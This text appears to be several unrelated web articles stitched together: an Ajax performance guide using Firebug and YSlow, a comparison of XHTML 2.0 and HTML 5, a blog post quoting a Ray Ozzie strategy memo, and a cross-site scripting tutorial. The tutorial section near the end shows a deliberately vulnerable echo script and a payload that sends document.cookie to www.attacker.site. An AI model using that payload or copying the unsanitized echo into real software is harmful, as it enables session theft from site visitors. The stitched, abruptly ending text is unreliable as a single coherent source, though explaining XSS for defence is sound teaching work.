Asynchronous JavaScript + XML (Ajax) continues to raise user expectations for interactivity and performance, and developers are increasingly treating Ajax as a must-have component of their Web applications. As more code is moved client side and the network model changes, the community is responding by building more tools to address the unique performance challenges of Ajax. Examine toolsets that find and correct performance problems within your Ajax-enriched applications.
Performance is one of the primary motivations for enhancing applications with Ajax. Ajax can improve response time by communicating with the server without full-page requests. By reducing response time, Ajax can provide a significantly better user experience. However, analyzing and improving the performance of Ajax applications requires a different toolset than traditional Web applications. This article examines these tools and shows how to use them to find performance problems and make corrections.
An Ajax application’s performance is based on several aspects of a Web application:
* Server response time
* Network transfer time
* Client JavaScript processing time
In traditional Web application development, server response time is the primary focus for performance analysis. Most performance analysis measures the application server’s ability to quickly handle requests, carry out necessary application logic, and generate a response. In Ajax application development, this is still a critical aspect of the application’s performance but is generally well understood.
The tools
To understand what aspects of a Web application you need to improve, you must properly analyze the components of the application. This article looks at how you can use the Firebug extension to Firefox and the YSlow add-on to instrument a Web application. After you install these tools, connect to the site that you are developing and click YSlow on the Firefox status bar. This opens the YSlow interface in Firebug. Now click the Performance button. YSlow performs an analysis of your application and provides a report on the different parts of the network transfer time of your application, as Figure 1 shows.
Network transfer time
In most Web applications, network transfer time is the biggest bottleneck. With a YSlow report, you can analyze the different aspects of the network transfer to understand what can be done to decrease the transfer time.
Reducing HTTP requests
Every HTTP request requires some time for the request to be sent to the server and the response to be retrieved. Even when responses are small, there is still the baseline roundtrip time, which is referred to as latency. YSlow provides a grade based on how many HTTP requests are made. A large number of requests results in significantly slower load times. You can reduce HTTP requests by simplifying the page so that fewer components need to be loaded. You can reduce image requests by using CSS sprites. Tools that generate CSS sprites are available (see the Resources section). To reduce script and CSS requests, include them inline in the page or combine multiple scripts or CSS files together.
You can reduce HTTP requests by providing HTTP cache expiration headers with future dates that allow browsers to cache components. It is important that as a user navigates from page to page, or returns to visit your site, that components can be cached and do not need to be downloaded each time your site is visited. Proxies can also cache frequently loaded content if proper expiration headers are provided. An expiration header looks like this:
Expires: Tue, 10 Mar 2009 10:00:00 GMT
Remember that if you use far future expiration dates, browsers will keep using their cached copy even after you have changed the content. You may want to reduce the expiration to a day in the future. Alternatively, you can change filenames when you version them so that a new release is requested under a new URL, which forces the browser to make a new request. You can configure Apache to add expiration headers with an ExpiresDefault directive:
ExpiresDefault "access plus 10 years"
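As a rough illustration of these two techniques, the following sketch builds an Expires header value a given number of days ahead and inserts a version tag into a filename so that each release gets a fresh URL. The function names expiresHeaderValue and versionedUrl, and the path in the usage lines, are hypothetical; they are not part of YSlow or Apache.

```javascript
// Build an HTTP Expires header value that lies `days` days after `now`.
// Date.prototype.toUTCString() produces the HTTP date format,
// for example "Tue, 10 Mar 2009 10:00:00 GMT".
function expiresHeaderValue(days, now) {
  const base = now instanceof Date ? now.getTime() : Date.now();
  const msPerDay = 24 * 60 * 60 * 1000;
  return new Date(base + days * msPerDay).toUTCString();
}

// Insert a version tag before the file extension so that a new release
// is requested under a new URL and never collides with a cached copy.
function versionedUrl(path, version) {
  const dot = path.lastIndexOf(".");
  const slash = path.lastIndexOf("/");
  if (dot <= slash) {
    return path + "." + version; // file name has no extension: append the tag
  }
  return path.slice(0, dot) + "." + version + path.slice(dot);
}

console.log("Expires: " + expiresHeaderValue(1));
console.log(versionedUrl("/js/app.js", "v2")); // "/js/app.v2.js"
```

With versioned filenames, a long expiration period becomes safer, because a changed file is never served under an old URL.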
With YSlow, you can also look at the total download size of your page by clicking the Stats button. YSlow shows the size of the page for a first-time visitor (with nothing cached) and for subsequent page visits (when caching can be used).
Alternate DNS lookup
HTTP requests can involve more than just a roundtrip to your server. If there are multiple host or domain names used by resources, the browser may need to do additional Domain Name System (DNS) lookups. YSlow alerts you if multiple names must be looked up. However, it is important to note that multiple DNS names can actually be a performance benefit as well. Most browsers only allow two connections per host name. But with multiple host names, more connections, and consequently more concurrent downloading, can take place.
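One way to spread resources over several host names is sketched below. It assumes a small, fixed list of host names (the example.com names are placeholders) and always maps a given path to the same host, so that a component cached under one host name is not downloaded again from another. Keeping the list short limits the extra DNS lookups.

```javascript
// Pick one of several host names for a resource path. The same path always
// maps to the same host, so the browser cache stays effective.
function hostForPath(path, hosts) {
  let hash = 0;
  for (let i = 0; i < path.length; i++) {
    hash = (hash * 31 + path.charCodeAt(i)) >>> 0; // keep an unsigned 32-bit value
  }
  return hosts[hash % hosts.length];
}

// Hypothetical host names, for illustration only.
const staticHosts = ["static1.example.com", "static2.example.com"];
console.log("http://" + hostForPath("/img/logo.png", staticHosts) + "/img/logo.png");
```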
Reducing the size of component transfers
In addition to reducing the number of HTTP requests, it is also advantageous to reduce the size of the components that are requested. Techniques can be applied to compress certain formats. YSlow indicates what techniques can be successfully applied to reduce response size.
You can shrink JavaScript code, CSS, and HTML by eliminating unnecessary whitespace and comments. You can further compress JavaScript code by renaming variables. Packer and YUI compressor are effective tools for JavaScript compression, and YUI compressor supports CSS compression as well. You can compare minifiers with The JavaScript CompressorRater.
One of the most effective ways to compress resources is by enabling gzip (short for GNU zip) for text-based resources. Using gzip, you can generally reduce content size by about 70%. Do not use gzip to compress resources that are already compressed, such as images and movies. Good candidates for gzip include CSS, HTML, JavaScript code, XML, and JavaScript Object Notation (JSON). Apache 1.3 supports gzip with mod_gzip and Apache 2.0 uses mod_deflate.
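If compression is decided in application code rather than in the server configuration, the rule above can be expressed as a simple check on the content type. This is only a sketch: the list of MIME types is an assumption that covers the formats named in the text, and shouldGzip is a hypothetical helper, not an Apache or YSlow function.

```javascript
// MIME types for the text-based formats named as good gzip candidates.
const COMPRESSIBLE_TYPES = [
  "text/css",
  "text/html",
  "text/javascript",
  "application/javascript",
  "application/json",
  "text/xml",
  "application/xml"
];

// Return true when a response with this Content-Type is worth compressing.
function shouldGzip(contentType) {
  // Drop parameters such as "; charset=utf-8" before comparing.
  const type = String(contentType).split(";")[0].trim().toLowerCase();
  return COMPRESSIBLE_TYPES.indexOf(type) !== -1;
}

console.log(shouldGzip("text/html; charset=utf-8")); // true
console.log(shouldGzip("image/png"));                // false
```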
Not only is it important to minimize the size of HTTP responses in terms of resource size, but it is also important to minimize the size of HTTP requests. For many Internet users, upload speeds can be significantly slower than downloads, and so performance can be more sensitive to request size. Large URLs, large post data, and excessive headers can also increase the size of a request. In Firebug, you can go to the Net tab to view your requests, as Figure 2 shows. For each request, you can expand the request to see the request headers. One of the most common sources of unnecessarily large header sizes is large cookies. Cookies are included in the header on every request, and, therefore, large cookies add a lot of extra overhead.
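To get a feel for the overhead that cookies add, you can estimate the size of the Cookie header line that accompanies each request. The helper below is a hypothetical sketch; it assumes the cookies are available as a plain object of name/value pairs and counts the bytes of the resulting header line.

```javascript
// Estimate how many bytes a set of cookies adds to each request header.
function cookieHeaderBytes(cookies) {
  const pairs = Object.keys(cookies).map(function (name) {
    return name + "=" + cookies[name];
  });
  if (pairs.length === 0) {
    return 0; // no cookies, no Cookie header
  }
  const headerLine = "Cookie: " + pairs.join("; ") + "\r\n";
  return new TextEncoder().encode(headerLine).length;
}

// Hypothetical cookie values, for illustration only.
const bytesPerRequest = cookieHeaderBytes({ session: "abc123", theme: "dark" });
console.log(bytesPerRequest + " bytes per request, " + bytesPerRequest * 40 + " bytes over 40 requests");
```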
Other network transfer performance improvements
Another YSlow recommendation is to use a content delivery network (CDN). A CDN provides a distributed network of servers with content that is closer to your end users for faster response times.
You can also improve the speed of rendering your Web pages by properly ordering your CSS and scripts. YSlow analyzes the position of your CSS and script declarations to provide information on how to improve the ordering. It is recommended that CSS declarations be at the top of the page so the CSS can immediately be used for rendering, and the scripts be at the bottom of the page so the page can render before loading the JavaScript code for interaction.
JavaScript processing time
After your Web page is successfully generated by the server and transferred to the browser, Ajax applications generally rely on JavaScript code for interactivity with the user. Most users are prepared to wait a little while for a page to fully download, but quality interaction depends on rapid feedback, so quick response to various components on your page can be the most important aspect of an enjoyable user experience. Also, browsers are usually still responsive when waiting for resources to download, but if JavaScript code is executing continuously, it can completely lock up the browser.
Firebug comes with a profiling tool. To use the profiler, go to the Console tab and click Profile to start the profiler. It may help to understand what part of your Web application makes heavy use of JavaScript code. The profiler also yields more accurate results if you can repeat the activity you are testing several times. For example, if there is a significant amount of JavaScript code that is executed when the page loads, you may want to do several page loads. If there are JavaScript hover event handlers, you may want to move the mouse around the page for a while to let the profiler collect a decent amount of information. When you finish your activity, you can click the Profile button again to display the profile results, as Figure 3 shows.
The profile result lists all the function calls that took place during the profile. Each entry shows the number of times that the function was called and statistics on the processing time for the function call. There is a Time column that indicates the total amount of time spent waiting for the function to return, and there is an Own Time column that indicates the total amount of time spent waiting for the function to return minus the time the function spent waiting for calls it made to return. Own time is generally the most important time because it represents where the majority of the expensive processing is taking place, and this time is what the values in the Percent column are based on. By default, Firebug sorts on the Percent column, with the highest values at the top. This is a convenient way to read the profile because the most expensive calls are on top, and you can focus your efforts on improving the performance of these functions. With Firebug, it is easy to go to the function source; you can simply click on the entry in the list to go to the function.
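The relationship between the Time and Own Time columns can be illustrated with a small calculation. The call tree below is invented for the example (it is not Firebug output), and each entry records the total time in milliseconds spent in that call, including the calls it made.

```javascript
// Own time = total time of the call minus the total time of the calls it made.
function ownTime(call) {
  const childTotal = (call.children || []).reduce(function (sum, child) {
    return sum + child.time;
  }, 0);
  return call.time - childTotal;
}

// Hypothetical profile data.
const renderPage = {
  name: "renderPage",
  time: 50,
  children: [
    { name: "buildTable", time: 30, children: [{ name: "formatCell", time: 25 }] },
    { name: "attachHandlers", time: 5 }
  ]
};

console.log(ownTime(renderPage));             // 50 - (30 + 5) = 15
console.log(ownTime(renderPage.children[0])); // 30 - 25 = 5
```

In this invented profile, renderPage has the largest Time value, but most of the actual work happens in formatCell, which is why sorting by own time points at the right function.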
When evaluating the performance of your JavaScript functions, it is also important to note the number of times the function was called. If it is called a large number of times, the function itself may not necessarily be slow (you can see the average processing time for the function), but it may simply be called too frequently. Sometimes poor performance can be a result of a function being used more frequently than expected. Hover event handlers such as onmousemove often produce a large number of events.
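When a handler is simply called too often, one common remedy is to throttle it so that it runs at most once per time interval. The following is a minimal sketch of that idea; throttle is a hypothetical helper, and the optional third argument exists only so that the clock can be replaced in tests.

```javascript
// Wrap `fn` so that it runs at most once every `intervalMs` milliseconds.
// Calls that arrive too soon are dropped. `now` is an optional clock
// function that defaults to Date.now.
function throttle(fn, intervalMs, now) {
  const clock = now || Date.now;
  let lastRun = -Infinity;
  return function () {
    const t = clock();
    if (t - lastRun >= intervalMs) {
      lastRun = t;
      return fn.apply(this, arguments);
    }
  };
}

// Hypothetical usage in a browser, where updateTooltip is an expensive handler:
// document.onmousemove = throttle(updateTooltip, 100);
```

Dropping intermediate events is usually acceptable for mouse movement, because only the most recent position matters to the user.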
If you can determine that a certain function is taking an excessive amount of time in processing, you may want to look at your JavaScript code for possible problems.
Table 1. Slow JavaScript operations
| Operation | Description |
|---|---|
| DOM access | Interaction with the DOM is usually slower than normal JavaScript code. Interaction with the DOM is usually inevitable, but try to minimize it. For instance, dynamically creating HTML with strings and setting the innerHTML is usually faster than creating HTML with DOM methods. |
| eval | Whenever possible, avoid the eval method because significant overhead is involved in script evaluation. |
| with | Using with statements creates additional scope objects that slow variable access and create ambiguities. |
| for-in loops | To traverse arrays, use the traditional for (var i = 0; i < array.length; i++) loop instead of a for-in loop. Unfortunately, most JavaScript environments have a slow implementation of for-in loops. |
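
The DOM access and for-in rows of Table 1 can be combined into one small sketch: the markup for a list is built as a single string with an indexed loop and would then be assigned to innerHTML once. The function names and the list items are hypothetical, and the escaping step is an added precaution that the table does not mention.

```javascript
// Escape text so that it can be placed safely inside HTML markup.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// Build the markup for a whole list as one string, walking the array
// with an indexed loop rather than for-in.
function buildListHtml(items) {
  const parts = ["<ul>"];
  for (let i = 0; i < items.length; i++) {
    parts.push("<li>" + escapeHtml(items[i]) + "</li>");
  }
  parts.push("</ul>");
  return parts.join("");
}

// In a browser, the result would be assigned once, for example:
// container.innerHTML = buildListHtml(["News", "Videos"]);
console.log(buildListHtml(["News", "Videos"]));
```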
Firefox with Firebug and YSlow is certainly the best choice for profiling. For Safari on Mac OS X, you can also use Web Inspector to analyze HTTP requests. For JavaScript performance profiling, you can use manual techniques to gauge the performance of certain functions. To instrument a function manually, you can measure the execution time with the Date object, as Listing 1 shows:
Listing 1. Manual method timing
function myFunctionToTest() {
  // Record the start time in milliseconds.
  var start = new Date().getTime();
  … // body of the function
  // Elapsed time in milliseconds for this call.
  var totalTime = new Date().getTime() - start;
}
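If you need to time several functions, the same technique can be moved into a reusable wrapper so that the functions themselves stay unchanged. The sketch below is one possible approach; instrument and sumTo are hypothetical names. The wrapper collects a call count and a total time, similar to the columns the Firebug profiler displays.

```javascript
// Wrap `fn` so that every call is counted and timed with the Date object.
function instrument(fn) {
  const stats = { calls: 0, totalMs: 0 };
  function wrapped() {
    const start = new Date().getTime();
    try {
      return fn.apply(this, arguments);
    } finally {
      // Runs even if fn throws, so failed calls are measured as well.
      stats.calls++;
      stats.totalMs += new Date().getTime() - start;
    }
  }
  wrapped.stats = stats;
  return wrapped;
}

// Hypothetical function under test.
function sumTo(n) {
  let total = 0;
  for (let i = 1; i <= n; i++) {
    total += i;
  }
  return total;
}

const timedSumTo = instrument(sumTo);
timedSumTo(1000);
timedSumTo(100000);
console.log(timedSumTo.stats.calls + " calls, " + timedSumTo.stats.totalMs + " ms in total");
```

Because Date has millisecond resolution, very fast functions need to be called many times before the total becomes meaningful.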
One particular problem that can plague performance is the poor memory management of Windows® Internet Explorer®. Unpatched Internet Explorer 6 and prior versions exhibit progressively slower behavior as more objects and properties are created. As a general rule, if you have more than 5000 objects, old versions of Internet Explorer will be considerably slower.
Conclusion
Using Firebug and YSlow, you can thoroughly analyze your Web applications to make educated changes to improve performance. YSlow provides detailed information to assist in reducing network transfer times. Firebug provides detailed JavaScript profiling analysis to determine critical areas of code to improve. Together, these tools can help you build Web applications with performance that provides the highest level of user experience.
Overview of XHTML 2.0
XHTML 2.0 is based solely on XML, forgoing the SGML heritage and syntax peculiarities present in current web markup. XHTML 2.0 is supposed to be a “general-purpose language,” with a minimal default feature set that is easy to extend using CSS and other technologies (XForms, XML Events, etc). It’s a modular approach that allows the XHTML2 group to focus on generic document markup, while others develop mechanisms for presentation, interactivity, document construction, etc.
Priority one for the XHTML2 working group is to further separate document content and structure from document presentation. Other goals include increased usability and accessibility, improved internationalization, more device independence, less scripting, and better integration with the Semantic Web. The group has been less concerned with backward compatibility than their predecessors (and the HTML working group), which has led them to drop some of the syntactic baggage present in earlier incarnations of HTML. The result is a cleaner, more concise language that corrects many of Web markup’s past indiscretions.
Overview of HTML 5
While XHTML 2.0 aims to be revolutionary, the HTML working group has taken a more pragmatic approach and designed HTML 5 as an evolutionary technology. That is to say, HTML 5 is an incremental step forward that remains mostly compatible with the current HTML 4/XHTML 1 standards. However, HTML 5 offers a host of changes and extensions to HTML 4/XHTML 1 that address many of the faults in these earlier specifications.
HTML 5 is about moving HTML away from document markup, and turning it into a language for web applications. To that end, much of the specification focuses on creating a more robust, feature-ful client side environment for web application development by providing a variety of APIs. Among other things, the spec stipulates that complying implementations must provide client-side persistent storage (both key/value and SQL storage engines), audio and video playback APIs, 2D drawing through the canvas element, cross-document messaging, server-sent events, and a networking API.
The HTML 5 specification maintains an SGML-like syntax that is compatible with the current HTML specifications (though some of the more esoteric features of SGML are no longer supported). Also included in the specification is a second “XML Serialization” which allows developers to serve valid XML documents as well. Again, by maintaining an SGML-like serialization the HTML 5 working group has struck a balance between pragmatism and progress. Developers can choose to mark up content using either the HTML serialization (which looks more like HTML 4.x) or the XML serialization (which looks more like XHTML 1.x).
Similar Features
It shouldn’t be too surprising that both working groups are proposing a number of similar features. These features address familiar pain points for web developers, and should be welcome additions to the next generation of markup languages.
Removal of Presentational Elements
A number of elements have been removed from both XHTML 2.0 and HTML 5 because they are considered purely presentational. The consensus is that presentation should be handled using style sheets.
HTML 5 and XHTML 2.0 documents cannot contain these elements: basefont, big, font, s, strike, tt, and u. XHTML 2.0 also removes the small, b, i, and hr elements, while HTML 5 redefines them with non-presentational meanings. In XHTML 2.0, the hr element has been replaced with separator in an attempt to reduce confusion (since the hr element, which stands for horizontal rule, is not necessarily either of those things).
Navigation Lists
Navigation lists have been introduced in both XHTML 2.0 and HTML 5. In XHTML 2.0, navigation is marked up using the new nl element. Navigation lists must start with a child label element that defines the list title. Following the title, one or more li elements are used to mark up links. Also new in XHTML 2.0 is the ability to create a hyperlink from any element using the href attribute. Combining these features produces simple, lightweight navigation markup:
<nl>
<label>Category</label>
<li href="/">All</li>
<li href="/news">News</li>
<li href="/videos">Videos</li>
<li href="/images">Images</li>
</nl>
In HTML 5, the new nav element has been introduced for this purpose. Unfortunately, nav is not a list element, so it cannot contain child li elements to logically organize links (perhaps a new idiom will develop). And since anchor tags are still required to create hyperlinks in HTML 5, navigation markup is not quite as elegant:
<nav>
<h1>Category</h1>
<ul>
<li><a href="/">All</a></li>
<li><a href="/news">News</a></li>
<li><a href="/videos">Videos</a></li>
<li><a href="/images">Images</a></li>
</ul>
</nav>
Enhanced Forms
Both specifications have new features to create more robust, consistent forms with less scripting. In XHTML 2.0, standard HTML forms are dropped completely in favor of the more comprehensive XForms standard. The XHTML2 working group does not control this standard, but references it from the XHTML 2.0 specification. To facilitate reuse, XForms separates the data being collected from the markup of the controls. It’s a robust and powerful language, but a full description is way beyond the scope of this post. Suffice it to say, there will be a bit of a learning curve for web developers trying to get up to speed with this technology.
HTML 5 retains the familiar HTML forms, but adds several new data types to simplify development and improve usability. In HTML 5, several new types of input elements have been introduced for email addresses, URLs, dates and times, and numeric data. This will allow user agents to provide more sophisticated user interfaces (e.g., calendar date pickers), integrate with other applications (e.g., pulling addresses from Outlook or Address Book), and validate user input before posting data to the server (less client-side JavaScript validation).
Semantic Markup
Both working groups have embraced the coming Semantic Web by allowing developers to embed richer metadata in their documents. As with forms, the XHTML2 working group has embraced a more sophisticated technology, while the HTML working group has kept things simple.
In XHTML 2.0, metadata can be embedded by using several new global attributes from the Metainformation Attributes Module. In particular, the new global role attribute is intended to describe the meaning of a given element in the context of the document. The technical term is Embedding Structured Data in Web Pages. Again, the group leverages an existing standard by referencing RDF. The technology is extremely powerful, but it’s also complicated.
The HTML working group has taken an approach that feels more like microformats by overloading the class attribute with a predefined set of reserved classes to represent various types of data. The specification currently lists seven reserved classes: copyright, error, example, issue, note, search, and warning. While overloading the class attribute like this might be confusing, it’s unlikely that user agents will render elements with these classes differently. And the class names are specific enough that there’s little worry: if an element has its class set to copyright, it’s probably a copyright whether the developer knew about the reserved classes or not.
Only in HTML 5
There are several new features that the HTML 5 specification describes that have no counterparts in XHTML 2.0.
Web Application APIs
HTML 5 introduces several APIs that will drastically improve the client-side web development environment. These APIs are what set HTML 5 apart as a proposal for a technology stack for Web Applications, rather than simply a markup language for documents. It should be noted that the details of these APIs are being worked out by the Web API working group, so they may be adopted with or without the rest of HTML 5. The new APIs, and corresponding elements are:
* A 2D drawing API using the canvas element.
* An audio and video playback API, supporting the ability to offer multiple formats to user agents, which can be used with the new video and audio elements.
* Persistent storage on the client-side with support for both key/value and SQL databases.
* An offline web application API (similar to Google Gears).
* An API that allows Web Applications to register themselves for certain protocols or MIME types.
* An editing API that can be used in combination with the global contenteditable attribute.
* A drag & drop API that can be used with the draggable attribute.
* A network API allowing Web applications to communicate using TCP.
* An API that exposes the browser history, allowing applications to add to it so they don’t break the back button.
* A cross-document messaging API.
* Server-sent events in combination with the new event-source element.
New Elements
Several new elements are being introduced by HTML 5 that aren’t available in XHTML 2.0:
* figure represents an image or graphic with a caption. A nested legend represents the caption, while a normal img element is used for the image.
* m represents text that has been marked in some way. It could be used to highlight search terms in resulting documents, for example.
* time represents dates and time.
* meter represents a measurement.
* datagrid represents an interactive tree list or tabular data.
* command represents a command that the user can invoke.
* event-source is used to “catch” server sent events.
* output represents some type of output, such as from a calculation done through scripting.
* progress represents a completion of a task, such as downloading or when performing a series of expensive operations.
In addition, several new elements will help semantically mark up the parts of a document. They’re fairly self-explanatory: section, article, header, footer, and aside. And a new dialog element is designed to represent conversations using child dt elements for the speaker’s name and dd elements for the text.
Track Users by Pinging URIs
The new ping attribute can be used on the a and area elements to do user tracking. Rather than using redirects, or relying on JavaScript, the ping attribute allows you to specify a space-separated list of URIs that should be pinged when the hyperlink is followed.
Only in XHTML 2.0
Also notable are the following new features that are available only in XHTML 2.0.
Any Element can be a Hyperlink
In XHTML 2.0, any element can be the source of a hyperlink — the href attribute can appear on any element. With this change the a element is no longer necessary, but it is retained.
Any Element can be an Image (or other resource)
In XHTML 2.0, the img element has been dropped. No worries, though — any element can now be an image. The idea is that all images have a “long description” that is equivalent to the image itself. By placing a src attribute on any element, you’re telling the user agent to load that resource in place of the element. If, for whatever reason, the resource is unavailable, the element is used instead. This allows developers to provide multiple equivalent resources using different file formats and representations by nesting elements within one another.
Lines Replace Line Breaks
The venerable br element, used to insert line breaks, has also been dropped from XHTML 2.0. The new l element is being introduced to replace it. l represents a line of text, and behaves like a span followed by a br in today’s markup.
New Heading Construct
The new h and section elements have been introduced to replace the numbered h1 through h6 elements. The goal is to accurately represent the hierarchical structure of a document. The current numbered headings are linear, not nested. By nesting section and h elements within parent sections the document structure is made explicit.
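To see why nesting makes the structure explicit, consider a small in-memory model of such a document. The sketch below is hypothetical (the object shape and the section titles are invented for illustration and are not part of XHTML 2.0): each section has one heading, h, and optional child sections, and the level of every heading follows from its nesting depth alone.

```javascript
// Walk nested sections and report each heading with the level implied
// by its nesting depth, where the outermost section is level 1.
function outline(section, depth) {
  const level = depth || 1;
  let entries = [{ level: level, heading: section.h }];
  const children = section.sections || [];
  for (let i = 0; i < children.length; i++) {
    entries = entries.concat(outline(children[i], level + 1));
  }
  return entries;
}

// Hypothetical document structure.
const article = {
  h: "Events",
  sections: [
    { h: "Introduction" },
    { h: "Specifying events", sections: [{ h: "Attaching events to handlers" }] }
  ]
};

outline(article).forEach(function (entry) {
  console.log("  ".repeat(entry.level - 1) + entry.heading);
});
```

With numbered headings, the same information has to be inferred from the sequence of h1 through h6 elements, which is what the new construct is meant to avoid.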
New Elements
The XHTML2 working group has focused on creating a more generic, simplified language. To that end, they’ve refrained from adding numerous specialized elements to represent different types of content. They argue that the new role attribute provides a mechanism for including rich metadata, making specialized elements unnecessary. That said, a few new elements were included:
* blockcode represents computer code.
* di represents a group of related terms and definitions in a dl (definition list). This is useful for words with multiple definitions, or multiple spellings.
* handler represents a scripted event handler, with a type attribute specifying the handler language. If the user agent doesn’t understand the language, the handler’s children are processed (otherwise they’re ignored). Handlers may be nested to provide multiple implementations in various languages.
Conclusion
Both proposals look promising, with lots of new features that address common web development problems. But neither specification is an official recommendation, and it’s likely to stay that way for some time.
Despite its late start, the HTML 5 working group seems to have more industry support, and is further along in the recommendation process. Their goal is to have a complete spec, with multiple interoperable implementations, by late 2010 (as I said before, though, the W3C has already missed some milestones in the approval process). With industry support from most of the major browser vendors (the only notable exception being Microsoft) it’s likely that this specification will be implemented quickly and consistently once it’s reached a stable state.
What everyone wants to avoid is another standards war. Fortunately, since both languages support XML namespaces (or, in the case of the HTML serialization of HTML 5, DOCTYPE switching) it’s unlikely that we’ll see the sort of browser dependent behavior we did in the 1990s. Standards wars aside, the future looks bright for web development. These new markup features and APIs will provide a rich environment for web development that should narrow the gap between Web and Desktop applications.
After a few years of trying to fill Bill Gates’ shoes as Microsoft’s chief software architect, Ray Ozzie is starting to hit his stride. In a remarkable strategy memo to employees (embedded below), Ozzie essentially shifts Microsoft’s mission from one of creating software for the PC and stand-alone servers to creating an interconnecting mesh between devices and people. He is not abandoning Windows or Office, but he is saying that the value of Microsoft’s software will increasingly depend less on what it can do on its own than what it can do with others. It is not about software anymore so much as it is about Web-based services. Ray, welcome to the club.
Excerpt:
Central to this strategy is our embrace of both a world of the web and a world of devices. Over the past ten years, the PC era has given way to an era in which the web is at the center of our experiences – experiences delivered not just through the browser but also through many different devices including PCs, phones, media players, game consoles, set-top boxes and televisions, cars, and more.
Guiding Principles
There are three overarching principles guiding our services strategy – principles informing the design and development of products being implemented across all parts of Microsoft, for both individuals and business.
1. The Web is the Hub of our social mesh and our device mesh.
The web is first and foremost a mesh of people. . . . All applications will grow to recognize and utilize the inherent group-forming aspects of their connection to the web, in ways that will become fundamental to our experiences. In scenarios ranging from productivity to media and entertainment, social mesh notions of linking, sharing, ranking and tagging will become as familiar as File, Edit and View. . . . To individuals, the concept of “My Computer” will give way to the concept of a personal mesh of devices – a means by which all of your devices are brought together, managed through the web, as a seamless whole.
2. The Power of “Choice” as business moves to embrace the cloud.
Most major enterprises are in the early stages of a significant infrastructural transition – from the use of dedicated and sometimes very expensive application servers, to the use of virtualization and commodity hardware to consolidate those enterprise applications on computing and storage grids constructed within their data center. . . . Driven in large part by the high-scale requirements of consumer services, the value of this utility computing model is most clearly evident in cloud-based internet services.
Software built explicitly to provide a significant level of server/service symmetry will afford choice and flexibility in developing, operating, migrating and managing such systems in highly varied enterprise deployment environments that are distributed and federated between the enterprise data center and the internet cloud.
3. Small Pieces Loosely Joined for developers, within the cloud and across a world of devices.
Application design patterns at both the front- and back-end are transitioning toward being compositions and in some cases loose federations of cooperating systems, where standards and interoperability are essential. . . . At a higher level, myriad options exist for delivering applications to the user: The web browser, unique in its ubiquity; the PC, unique in how it brings together interactivity/experience, mobility and storage; the phone, unique in its extreme mobility. Developers will need to build applications that can be delivered seamlessly across a loosely coupled device mesh by utilizing a common set of tools, languages, runtimes and frameworks – a common toolset that spans from the service in the cloud to enterprise server, and from the PC to the browser to the phone.
Cross-site scripting (XSS for short) is one of the most common application-level attacks that hackers use to sneak into Web applications. XSS is an attack on the privacy of clients of a particular Web site, which can lead to a total breach of security when customer details are stolen or manipulated. Most attacks involve two parties: either the attacker and the Web site or the attacker and the client victim. Unlike those, the XSS attack involves three parties: the attacker, the client, and the Web site.
The goal of the XSS attack is to steal the client cookies or any other sensitive information that can identify the client with the Web site. With the token of the legitimate user in hand, the attacker can proceed to act as the user in interaction with the site, and thus impersonate the user. For example, in one audit conducted for a large company, it was possible to peek at the user’s credit card number and private information by using an XSS attack. This was achieved by running malicious JavaScript code on the victim (client) browser, with the access privileges of the Web site. These are the very limited JavaScript privileges that generally do not let the script access anything but site-related information. Yet this is enough for the script to collect the cookies and send them to the attacker. As a result, the attacker gets the cookies and impersonates the victim. It is important to stress that, although the vulnerability exists at the Web site, at no time is the Web site directly harmed.
Explanation of the XSS technique
Let’s call the site under attack www.vulnerable.site. At the core of a traditional XSS attack lies a vulnerable script in the vulnerable site. This script reads part of the HTTP request (usually the parameters, but sometimes also HTTP headers or the path) and echoes it back to the response page, in full or in part, without first sanitizing it (that is, without making sure that it contains neither JavaScript code nor HTML tags). Suppose, therefore, that this script is named welcome.cgi, and its parameter is name. It can be operated this way:
GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0
Host: www.vulnerable.site
The response would be:
<HTML>
<Title>Welcome!</Title>
Hi Joe Hacker <BR>
Welcome to our system
…
</HTML>
How can this be abused? The attacker lures the victim client into clicking a link that the attacker supplies. This is a carefully and maliciously crafted link that causes the Web browser of the victim to access the site (www.vulnerable.site) and invoke the vulnerable script. The data passed to the script consists of JavaScript that accesses the cookies that the client browser has stored for www.vulnerable.site. This is allowed because the client browser "experiences" the JavaScript as coming from www.vulnerable.site, and the JavaScript security model allows scripts arriving from a particular site to access cookies that belong to that site.
Such a link looks like this one:
http://www.vulnerable.site/welcome.cgi?name=<script>alert(document.cookie)</script>
The victim, upon clicking the link, will generate a request to www.vulnerable.site, as follows:
GET /welcome.cgi?name=<script>alert(document.cookie)</script> HTTP/1.0
Host: www.vulnerable.site …
The vulnerable site response would be:
<HTML>
<Title>Welcome!</Title>
Hi <script>alert(document.cookie)</script> <BR>
Welcome to our system
…
</HTML>
The victim client’s browser would interpret this response as an HTML page containing a piece of JavaScript code. This code, when executed, is allowed to access all cookies belonging to www.vulnerable.site. Therefore, it will pop up a window at the client browser showing all client cookies belonging to www.vulnerable.site.
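The behavior of welcome.cgi described above can be imitated with a minimal Python sketch. The original script's language and source are not given, so the function name render_welcome and its page template are assumptions made purely for illustration; the only property that matters is that the name parameter is pasted into the page unchanged.

```python
from urllib.parse import parse_qs, urlsplit


def render_welcome(url: str) -> str:
    """Hypothetical stand-in for welcome.cgi: echoes 'name' without sanitizing it."""
    query = parse_qs(urlsplit(url).query)
    name = query.get("name", [""])[0]
    # VULNERABLE on purpose: the parameter is inserted into the HTML as-is.
    return (
        "<HTML>\n<Title>Welcome!</Title>\n"
        f"Hi {name} <BR>\nWelcome to our system\n</HTML>"
    )


benign = render_welcome("http://www.vulnerable.site/welcome.cgi?name=Joe%20Hacker")
hostile = render_welcome(
    "http://www.vulnerable.site/welcome.cgi"
    "?name=<script>alert(document.cookie)</script>"
)
print(benign)
print(hostile)
```

In the second page the script element arrives intact, so a browser would treat it as code that belongs to www.vulnerable.site.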
Of course, a real attack would consist of sending these cookies to the attacker. For this, the attacker may erect a Web site (www.attacker.site) and use a script to receive the cookies. Instead of popping up a window, the attacker would write code that accesses a URL at www.attacker.site, thereby invoking the cookie-reception script, with a parameter being the stolen cookies. This way, the attacker can get the cookies from the www.attacker.site server.
The malicious link would be:
http://www.vulnerable.site/welcome.cgi?name=<script>window.open("http://www.attacker.site/collect.cgi?cookie="%2Bdocument.cookie)</script>
And the response page would look like:
<HTML>
<Title>Welcome!</Title>
Hi <script>window.open("http://www.attacker.site/collect.cgi?cookie="+document.cookie)</script> <BR>
Welcome to our system
…
</HTML>
